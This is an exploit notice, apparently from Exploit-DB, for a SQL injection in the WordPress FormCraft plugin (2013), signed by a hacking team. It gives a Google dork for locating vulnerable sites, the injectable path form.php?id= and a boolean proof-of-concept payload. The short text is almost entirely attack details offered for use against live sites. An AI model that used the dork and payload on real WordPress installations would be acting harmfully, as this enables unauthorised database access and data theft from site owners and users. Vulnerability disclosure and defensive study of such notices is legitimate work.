30 lines
No EOL
666 B
Text
30 lines
No EOL
666 B
Text
#######################################################################
|
|
# Exploit Title : Wordpress formcraft Plugin Sql Injection
|
|
#
|
|
# Exploit Author : Ashiyane Digital Security Team
|
|
#
|
|
# Google Dork : inurl:/wp-content/plugins/formcraft
|
|
#
|
|
# Software Link : www.wordpress.org
|
|
#
|
|
# Tested on: Windows , Linux
|
|
#
|
|
# Date: 2013/12/2
|
|
#
|
|
#############################################
|
|
# Exploit : Sql Injection
|
|
#
|
|
# Location1:
|
|
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
|
|
#
|
|
#
|
|
#
|
|
# Exploit-DB Note:
|
|
# A PoC: form.php?id=1%20and%20 1=1
|
|
##########################################
|
|
|
|
##############
|
|
Milad Hacking
|
|
|
|
We Love Mohammad
|
|
############## |